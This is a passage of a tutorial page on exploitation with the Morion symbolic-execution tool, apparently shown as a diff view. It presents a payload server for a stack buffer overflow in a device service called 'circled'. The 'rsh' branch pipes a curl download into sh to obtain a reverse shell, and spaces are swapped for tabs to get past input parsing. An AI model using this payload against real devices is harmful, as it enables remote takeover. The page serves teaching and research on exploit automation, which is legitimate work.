||||
Given the information we learned so far, it is a rather simple task to run the PoC payload into a
|
||||
more powerful one, e.g. opening us a reverse shell on the targeted devices. File
|
||||
[circled.server.py](../server/circled.server.py#L120) implements this and serves the corresponding
|
||||
payload when running with command-line argument `--payload "rsh"`.
|
||||
```python
|
||||
[...]
|
||||
# Serve requests for circleinfo.txt
|
||||
if payload == "leg":
|
||||
return self.serve_file("resources/circleinfo.txt")
|
||||
elif payload == "pov":
|
||||
return b"A"*1021 + b" X"
|
||||
elif payload == "poc1":
|
||||
p = [...]
|
||||
return p
|
||||
elif payload == "poc2":
|
||||
p = [...]
|
||||
return p
|
||||
[...]
|
||||
elif payload == "rsh":
|
||||
cmd = "curl http://127.0.0.1:5000/stage1|sh"
|
||||
else:
|
||||
cmd = payload
|
||||
[...]
|
||||
|
||||
# Replace spaces in the command (spaces cannot be used due to sscanf(str, "%s %s"))
|
||||
cmd = "touch$\t/tmp/st0;" + cmd.replace(" ", "\t") + ";#"
|
||||
@@ -724,11 +720,23 @@ HttpHandler.cmd_addr = cmd_addr - 0x1000
|
||||
return payload
|
||||
[...]
|
||||
```
|
||||
## TODO
|
||||
- Explain `circled.server.py`
|
||||
- Test reverse shell payload
|
||||
- Explain reverse shell payload
|
||||
- Add screencast
|
||||
|
||||
|
||||
We fill up with a nonexistent command `X...X;cmd` to improve ASLR brute-forcing?
|
||||
|
||||
- Note: The shown exploit could easily be generated without using symbolic execution. However, we
|
||||
have chosen it since it is rather easy to follow along and suitable to explain how Morion works.
|
||||
|
||||
- Conclusions
|
||||
- Well-known and rather simple to exploit vulnerability class (stack buffer overflow)
|
||||
- Exploitation of others might be harder to automate with symbolic execution (heap overflows, race conditions, etc.)
|
||||
- A lot open challenges regarding environment modeling / (semantic) function modeling (see my presentations)
|
||||
- Sometimes not needed, sometimes a simplified model might work, sometimes minor details mather
|
||||
|
||||
----------------------------------------------------------------------------------------------------
|
||||
[Back-to-Top](./6_exploitation.md#table-of-contents)
|
||||
Reference in New Issue
Block a user